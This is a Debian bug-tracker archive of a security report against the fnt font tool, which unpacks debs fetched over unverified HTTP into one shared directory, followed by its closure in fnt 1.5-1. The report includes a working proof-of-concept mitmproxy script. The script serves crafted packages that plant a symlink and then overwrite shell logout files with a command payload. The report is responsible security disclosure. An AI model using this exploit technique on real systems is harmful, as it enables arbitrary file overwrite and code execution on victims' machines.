Bug#1043469: marked as done (fnt: insecure deb unpacking)

Fri, 01 Dec 2023 13:39:15 -0800 

Your message dated Fri, 01 Dec 2023 21:34:14 +0000
with message-id <e1r9b9k-00fbcy...@fasolo.debian.org>
and subject line Bug#1043469: fixed in fnt 1.5-1
has caused the Debian Bug report #1043469,
regarding fnt: insecure deb unpacking
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
1043469: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1043469
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message --- 
Package: fnt
Version: 1.4.1-2
Severity: serious
Tags: security

https://www.gnu.org/software/tar/manual/html_node/Integrity.html says:
"When extracting from two or more untrusted archives, each one should be extracted independently, into different empty directories. Otherwise, the first archive could create a symbolic link into an area outside the working directory, and the second one could follow the link and overwrite data that is not under the working directory."
But fnt extracts every data.tar file into the same directory and does not correctly remove files (potentially: malicious symlinks) after extraction. Since fnt downloads debs over HTTP and does not verify their integrity in any way, man-in-the-middle attackers could exploit this vulnerability to overwrite arbitrary files.
I've attached a proof-of-concept exploit in the form of a mitmproxy script. 

--
Jakub Wilk

# encoding=UTF-8

# Copyright © 2023 Jakub Wilk <jw...@jwilk.net>
# SPDX-License-Identifier: MIT

# Usage:
#   mitmdump --listen-host 127.0.0.1 -s /path/to/fnt_mitm.py
# and then:
#   export http_proxy=http://127.0.0.1:8080/
#   fnt update
#   fnt install symbola
#   fnt install unifont
#   logout

import contextlib
import io
import os
import subprocess
import tarfile
import tempfile

try:
    from mitmproxy.http import Response as HTTPResponse  # mitmproxy >= 7.0
except ImportError:
    from mitmproxy.http import HTTPResponse  # mitmproxy >= 1.0

payload = b'''\
cowsay pwned
sleep inf
'''

debs = []

def mkar(members):
    with tempfile.TemporaryDirectory() as tmpdir:
        ar_path = f'{tmpdir}/out.ar'
        subprocess.run(['ar', 'rcS', ar_path, *members], check=True)
        with open(ar_path, 'rb') as file:
            return file.read()

@contextlib.contextmanager
def tmpcwd():
    old_cwd = os.getcwd()
    try:
        with tempfile.TemporaryDirectory() as tmpdir:
            os.chdir(tmpdir)
            yield
    finally:
        os.chdir(old_cwd)

with tmpcwd():
    members = ['debian-binary', 'control.tar.xz', 'data.tar.xz']
    for member in members:
        with open(member, 'wb'):
            pass
    with tarfile.open('data.tar.xz', mode='w|xz') as tfile:
        tinfo = tarfile.TarInfo('par')
        tinfo.type = tarfile.SYMTYPE
        tinfo.linkname = '..'
        tfile.addfile(tinfo)
    debs += [mkar(members)]
    with tarfile.open('data.tar.xz', mode='w|xz') as tfile:
        for target in '.bash_logout', '.zlogout':
            tinfo = tarfile.TarInfo(f'par/{target}')
            tinfo.size = len(payload)
            tfile.addfile(tinfo, io.BytesIO(payload))
    debs += [mkar(members)]

class state:
    n = 0

def request(flow):
    if flow.request.path.endswith('.deb'):
        flow.response = HTTPResponse.make(
            200,
            debs[state.n],
            {'Content-Type': 'application/vnd.debian.binary-package'}
        )
        state.n ^= 1

# vim:ts=4 sts=4 sw=4 et

--- End Message ---
--- Begin Message --- 
Source: fnt
Source-Version: 1.5-1
Done: Gürkan Myczko <t...@debian.org>

We believe that the bug you reported is fixed in the latest version of
fnt, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 1043...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Gürkan Myczko <t...@debian.org> (supplier of updated fnt package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Format: 1.8
Date: Fri, 01 Dec 2023 21:04:13 +0100
Source: fnt
Architecture: source
Version: 1.5-1
Distribution: unstable
Urgency: medium
Maintainer: Debian Fonts Task Force <debian-fo...@lists.debian.org>
Changed-By: Gürkan Myczko <t...@debian.org>
Closes: 1043469
Changes:
 fnt (1.5-1) unstable; urgency=medium
 .
   * New upstream version. (Closes: #1043469)
   * debian/patches: dropped.
Checksums-Sha1:
 caa9bf2fa4f6ca308514746f29c9b22f72fb2eec 1819 fnt_1.5-1.dsc
 4ca8fd2ac90840693a8f79faeb6623ff06ed3162 7473 fnt_1.5.orig.tar.gz
 dea5bb2b5cae1beed029947ba3f703ff59357666 3328 fnt_1.5-1.debian.tar.xz
 6a11ab72c927e751eba0897506434c9e23e49423 6828 fnt_1.5-1_source.buildinfo
Checksums-Sha256:
 fc281b97f1a4cc90292a70a0d7b80f950cc4b7319a88b0f94eb3dca448cc09e3 1819 
fnt_1.5-1.dsc
 f27271881858f35fc44802296c32d4b905c77f92171e8ac7593ffcc6e32a9ebb 7473 
fnt_1.5.orig.tar.gz
 9d4aa4b28ca23cab5616038a12f5c4820475f425031b8272b7b9db75ac425888 3328 
fnt_1.5-1.debian.tar.xz
 4d09a10cd80573b2f83a82b792ac31496f120f6fed720ac1d21eb93ca446c3e9 6828 
fnt_1.5-1_source.buildinfo
Files:
 f30fca7e2730c047340bc6e9ea3ea988 1819 fonts optional fnt_1.5-1.dsc
 e2d25c7845bc2617f618a0701f7ceabe 7473 fonts optional fnt_1.5.orig.tar.gz
 4f807c207a43920be52f5f2a7f08dac3 3328 fonts optional fnt_1.5-1.debian.tar.xz
 5bb950dba426e254367fd412b8135e90 6828 fonts optional fnt_1.5-1_source.buildinfo

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEtgob82PcExn/Co6JEWhSvN91FcAFAmVqTYwACgkQEWhSvN91
FcCAww/8CpadMlzcCQQbL5txBRQHxHuEBRSwQapMOgeJmpl4gQ49MYtfUb9xVwOi
WX14rV9BdC+XdTPK9UjEHLUadCLkUMZ4FgHTDP6GqUzVwQqePygUCTVY5GLWwRQZ
/jvPlvOLeD6uP9rwqf80ucppmgT+IF4xHBJWQ7AvIMOAiQ/Dw8FROS6pwBk/9W+P
Ikjnkd1m6nJTN8qRW98uAERn/GXwfW5SPvhp8Rxpa+bP4eOhW3+ctNM6UothbuIp
W7JIPV+GNKqXF9HSThAtZ2l+WHNiFv4MVYa1qzcaFs5EjgPh9P/zwiGy8tsFEZJr
+BOtVy8tJ/WZg4Zin0pvT3KGz0z5O6OneUjB8aXucRim9Z3GqWv2meWkacmR2/Pe
U577ExdFoYjmQa0X0ms2ReYxAFwXtZtE/o9wti1W+lfHF8ZCc/NhPdOPwgHFwRqN
MXrSMGxvRqwGrT+Ybj/CEQ+rdBwxjYWcazJYUrheiNXhI+HwVWRfcfXE72S9U+3/
dGw5K5q8+OYEP3bwh2UygTFicGINZ/FB7nsCKU4KZoNJ2wIT5jBNtina2d0x92G9
/6q3w9kGmvNzZZ0VNJ/aahYsZEDjyru6cFMiobjhkgR3TVYvnIer4V3VLsfED6Dl
b1G3EPUCQlHydfchFcCCOFijvqMxy8ds9cDxHgDBJmG+NZaBTrQ=
=N/8g
-----END PGP SIGNATURE-----

--- End Message ---

Reply via email to